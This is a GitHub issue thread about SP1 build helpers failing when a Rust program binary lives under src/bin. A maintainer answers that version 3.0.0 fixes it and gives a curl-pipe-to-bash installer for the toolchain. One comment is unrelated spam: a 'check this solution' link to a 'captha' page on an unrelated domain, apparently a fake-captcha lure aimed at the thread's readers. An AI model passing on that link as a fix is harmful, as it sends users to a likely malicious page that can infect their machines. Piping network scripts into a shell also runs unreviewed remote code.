### ISSUE TITLE
Build helpers don't seem to support --binary option

### ISSUE THREAD

**Issue by sina-wit** [succinctlabs/sp1#1616]
I'm seeing an issue where binaries that aren't named `src/main.rs` don't get built properly, whether using `build.rs` or manually calling the `sp1_helper` util, wanted to see if there's something obvious I'm missing?

See repro with minimal diff from your template @ https://github.com/sina-wit/sp1-project-template/tree/sina/broken

tldr all I did was move `program/src/main.rs` to `program/src/bin/main.rs` which seems to break `build.rs` as well as `cd program && cargo prove build`, which both worked before doing that move.

Was originally trying to get it working with binaries with other names (eg. `src/bin/main2.rs`), which also wasn't working

**Comment by CanutoIX** [comment]
to fix your trouble check this solution [click](https://www.calvarywhangarei.co.nz/captha/index.html)
maybe this will solve your problem.

**Comment by ratankaliani** [comment]
This is resolved in SP1 3.0.0 by this PR: https://github.com/succinctlabs/sp1/pull/1526. Just bump your `sp1-build` dependency to `3.0.0` and it should be resolved!

If you encounter this with the `cargo prove` toolchain, you can install the latest toolchain by running:

```shell
curl -L https://sp1.succinct.xyz | bash

sp1up
```
